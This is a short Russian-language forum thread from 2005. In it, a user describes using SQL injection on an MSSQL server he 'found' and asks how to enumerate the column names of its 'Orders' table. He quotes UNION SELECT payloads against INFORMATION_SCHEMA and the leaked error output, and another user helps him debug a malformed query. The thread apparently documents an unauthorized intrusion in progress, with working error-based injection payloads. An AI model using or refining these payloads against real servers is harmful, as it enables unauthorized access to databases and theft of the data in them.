Вопросы по SQL Injection
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя |
Сообщение |
<< Старые топики Новые топики >> |
|
|
Вопросы по SQL Injection - 2005-08-11 22:20:14
|
|
|
Кruger
Сообщений: 4
Оценки: 0
Присоединился: 2005-08-11 21:30:23
|
Нашел сервак на котором стоит MSSQL, и с помощью скул иъекции узнал что там есть таблица Orders. Теперь вопрос: как можно узнать ВСЕ названия столбцов. Первое название столбца с помощью такого запроса UNION SELECT COLUMN_NAME,null FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=''OrderItems'' выдает: [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ''Account'' to a column of data type int.
Т.е перовый столбец ''Account''. Здесь читал __http://injection.rulezz.ru/MSSQL-ASP-Injection.html что остальные названия можно узнать с помощью запроса UNION SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=''Orders'' WHERE COLUMN_NAME NOT IN (''Account'') но на ето он жалуется [Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near the keyword ''where''. Вот собственно вопрос: как зделать чтоб етого не было?
|
|
|
Вопросы по SQL Injection - 2005-08-12 15:39:46
|
|
|
Great
Сообщений: 1046
Оценки: 0
Присоединился: 2005-08-11 19:41:36
|
[p]quote:
—————-<BR>Цитата: Дата:11.08.2005 22:20:14, Автор: Кruger :: Нашел сервак на котором стоит MSSQL, и с помощью скул иъекции узнал что там есть таблица Orders.<BR>Теперь вопрос: как можно узнать ВСЕ названия столбцов. Первое название столбца с помощью такого <BR>запроса<BR>UNION SELECT COLUMN_NAME,null FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='OrderItems' выдает: <BR>[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Account' to a column of data type int.<BR><BR>Т.е перовый столбец 'Account'. Здесь читал __http://injection.rulezz.ru/MSSQL-ASP-Injection.html что остальные названия можно узнать с помощью запроса<BR>UNION SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='Orders' WHERE COLUMN_NAME NOT IN ('Account')<BR>но на ето он жалуется<BR>[Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near the keyword 'where'.<BR>Вот собственно вопрос: как зделать чтоб етого не было? <BR> —————-
Около конкретно какого WHERE ошибка?
|
|
|
Вопросы по SQL Injection - 2005-08-12 21:27:30
|
|
|
Кruger
Сообщений: 4
Оценки: 0
Присоединился: 2005-08-11 21:30:23
|
По ходу, в втором. Т.к перед ним стоит кавычка
|
|
|
|
|